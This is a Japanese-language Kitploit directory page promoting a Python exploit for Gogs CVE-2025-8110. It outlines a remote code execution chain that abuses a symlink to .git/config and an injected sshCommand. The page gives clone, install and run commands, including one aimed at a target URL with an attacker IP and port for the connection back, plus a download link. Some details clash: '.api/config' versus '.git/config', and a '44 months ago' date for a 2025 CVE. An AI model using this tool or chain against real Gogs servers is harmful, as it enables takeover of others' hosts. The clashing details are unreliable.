Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-8110-GOGS-RCE — GOGS RCE cve-2025-8110 Pythonスクリプト。リポジトリを作成し、.git/config を指すシンボリックリンクファイルを設置し、設定ファイルの sshCommand を改ざんしてRCEをトリガーする攻撃チェーン全体を自動化します。 | Kitploit
ツール/GitHubGitHub/kayl22/cve-2025-8110-gogs-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubkayl22/cve-2025-8110-gogs-rce

cve-2025-8110-GOGS-RCE

GOGS RCE cve-2025-8110 Pythonスクリプト。リポジトリを作成し、.git/config を指すシンボリックリンクファイルを設置し、設定ファイルの sshCommand を改ざんしてRCEをトリガーする攻撃チェーン全体を自動化します。

リポジトリを見る
44ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GOGS RCE cve-2025-8110

Gogs は軽量でセルフホスト可能な Git サービスであり、GitHub のプライベート版に似ています。低リソースのサーバーでも簡単に動作するように設計されています。CVE-2025-8110 の脆弱性は、シンボリックリンクを使用することでパス制限を回避できる重大なセキュリティ欠陥です。攻撃者は .api/config を指す悪意のあるリンクをアップロードすることで、gogs API を利用して sshCommand パラメータを含む悪意のある設定ファイルを埋め込み、ホストサーバー上で RCE を達成できます。



使用方法

  1. このリポジトリをローカルマシンにクローンします:
root@kitploit:~
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE

  1. すべての依存関係をインストールします
root@kitploit:~
pip3 install -r ./requirements.txt

  1. スクリプトを実行します
root@kitploit:~
# ヘルプを表示
python3 ./cve-2025-8110.py --help

# 登録ステップを含む攻撃チェーンを実行
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>

# 登録をスキップして攻撃チェーンを実行(register関数がエラーを返す場合に便利)
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>


仕組み

このスクリプトは以下のステップからなる攻撃チェーンに従います:

root@kitploit:~
1. 使い捨てアカウントを登録し認証する(-U および -P フラグで資格情報が提供された場合は登録をスキップ)
2. API ベアラートークンを取得する
3. 自動初期化されたリポジトリを作成する
4. ローカルにリポジトリをクローンし、相対シンボリックリンク malicious_link -> .git/config をプッシュする
5. PutContents API を介してシンボリックリンクを通じて悪意のある git config(sshCommand を含む)を PUT する
6. SSH 経由でリポジトリをクローンして sshCommand をトリガーする

クレジット

このスクリプトは zAbuQasem (https://github.com/zAbuQasem) の PoC を基に作成されました。

ツールをダウンロード